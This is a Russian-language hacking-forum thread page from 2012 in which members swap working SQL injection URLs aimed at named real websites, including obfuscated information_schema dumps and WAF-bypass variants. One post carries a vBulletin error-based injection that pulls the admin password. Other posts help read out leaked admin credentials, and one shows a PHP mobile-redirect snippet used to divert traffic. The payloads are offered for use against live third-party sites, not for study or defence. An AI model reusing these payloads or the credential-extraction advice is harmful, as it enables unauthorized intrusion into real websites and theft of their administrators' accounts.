HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #19601  
Старый 10.02.2012, 17:31
james00x
Новичок
Регистрация: 06.02.2012
Сообщений: 9
С нами: 7507766

Репутация: 0
По умолчанию

Как узнать в ProFTPD, включен или выключен mod_sql?

Я слышал, что это exploit http://www.exploit-db.com/exploits/15449/ не работает при включении mod_sql или наоборот.
 
Ответить с цитированием

  #19602  
Старый 10.02.2012, 17:34
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

Цитата:
Сообщение от ivan151  
не поможите таблицу с данными админа найти,просто на сайте как таковых пользователей нет т.к там нет ничего(ни форума ни каких-то отзывов ну и ничего,для чего собственно и регестрируются люди) но на главной странице есть форма входа при нажатии "вход" с пустыми полями ведёт на /admin/index.php судя по всему админка,ну значит и таблица с данными должна быть вот сайт http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,table_NAME,3,4,5+FROM+INFORMATION _SCHEMA.tables+limit+0,1
Moodle ^_^

Код:
http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,(%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(null)%66rom(%69nformation_schema.%63olumns)%77here(%74able_schema!=0x696e666f726d6174696f6e5f736368656d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,%63olumn_name))))x),3,4,5
 
Ответить с цитированием

  #19603  
Старый 10.02.2012, 17:43
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами: 7712246

Репутация: 23
По умолчанию

Цитата:
Сообщение от Ereee  
Код:
AddType application/x-httpd-php .css .shtml
Подозрительно ^.
PHP/Javascript-редирект сделать легко.
Пример PHP:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$version[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]"desktop"[/COLOR][COLOR="#007700"]) {

[/
COLOR][COLOR="#0000BB"]$useragent[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_USER_AGENT'[/COLOR][COLOR="#007700"]];

if([/
COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$useragent[/COLOR][COLOR="#007700"])||[/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|e\-|e\/|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|xda(\-|2|g)|yas\-|your|zeto|zte\-/i'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$useragent[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"])))

[/
COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Location: http://TRAFF'[/COLOR][COLOR="#007700"]);

}[/
COLOR][/COLOR
Javascript:
Код:

Я удалил строчку с .htaccess

AddType application/x-httpd-php .css .shtml

Все равно трафф не идет
 
Ответить с цитированием

  #19604  
Старый 10.02.2012, 17:45
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами: 7712246

Репутация: 23
По умолчанию

Цитата:
Сообщение от Moriarty  
это же космический ...дец!
ну чуть ниже! на 10-15 пикселей ниже твоего хтаксес кода(в промо разделе пиратов)! совсем на чуть чуть! находится js-код который делает тоже самое, дружище! удачи!
а вообще проверь id суббака! скорей это не админ, а кто то трафф тырит!
зы. и с чьего же ты благословения на скайп то льешь...
как проверить id суббака?
 
Ответить с цитированием

  #19605  
Старый 10.02.2012, 22:56
lightangel
Познающий
Регистрация: 07.11.2011
Сообщений: 91
С нами: 7638806

Репутация: -6
По умолчанию

Код:
http://www.awt.com.pk/news_detail.php?news_id=5+/*!union*/+/*!select*/+1+/!*group_concat*/%28table_name%29,3,4,5+from+/!*information_schema*/.tables%20where%20table_shcema=database%28%29--
Does not work, WAF?
 
Ответить с цитированием

  #19606  
Старый 10.02.2012, 23:49
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами: 7854806

Репутация: 173


По умолчанию

Многие наверно видели уязвимость булки отсюда

Цитата:
Сообщение от None  
/showpost.php?p=2833234&postcount=127
Вопрос:

Как откорректировать запрос, если ответ от БД &

Цитата:
Сообщение от None  
does_forum.user
Я делал запрос вида

Цитата:
Сообщение от None  
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=p rocess&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
 
Ответить с цитированием

  #19607  
Старый 11.02.2012, 00:40
anonym_di
Познающий
Регистрация: 21.01.2012
Сообщений: 55
С нами: 7530806

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
вот отлично вот вывел инфу Adminusti,obz:zbo и что тут что? admin-логин а остальное пароль или pusti-логин а остальное пароль?
Смотря какие поля ты выводил
 
Ответить с цитированием

  #19608  
Старый 11.02.2012, 01:44
pirat0
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами: 8063606

Репутация: -1
По умолчанию

Цитата:
Сообщение от lightangel  
Код:
http://www.awt.com.pk/news_detail.php?news_id=5+/*!union*/+/*!select*/+1+/!*group_concat*/%28table_name%29,3,4,5+from+/!*information_schema*/.tables%20where%20table_shcema=database%28%29--
Does not work, WAF?
waf!!

that's work )))

http://www.awt.com.pk/news_detail.php?news_id=-5+union+/*!select*/+1,2,3,4,/*!table_name*/+from+information_schema./*!tables*/+where+table_schema=0x617774636F6D5F617774+limit+0 ,10--
 
Ответить с цитированием

  #19609  
Старый 11.02.2012, 15:43
pirat0
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами: 8063606

Репутация: -1
По умолчанию

Цитата:
Сообщение от ivan151  
вывел с разных полей получилось логин Admin пасс pusti а что тогда obz:zbo? и с такими данными пишет ошибку авторизации,странно вообще как то
если ты все верно написал то должно быть так-

Adminusti,obz - login

zbo - password

p.s.

разделитель у тебя 0x3a= :
 
Ответить с цитированием

  #19610  
Старый 11.02.2012, 16:04
trololoman96
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
С нами: 7604246

Репутация: 55
По умолчанию

Цитата:
Сообщение от pirat0  
если ты все верно написал то должно быть так-
Adminusti,obz - login
zbo - password
p.s.
разделитель у тебя 0x3a= :
Херню посоветовал. Там же group_concat а не просто concat или concat_ws используется. Поэтому вывелось 2 акка, разделитель :. Выходит так:

логин - Admin

пароль - pusti

со 2 (тот что через запятую) точно также.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...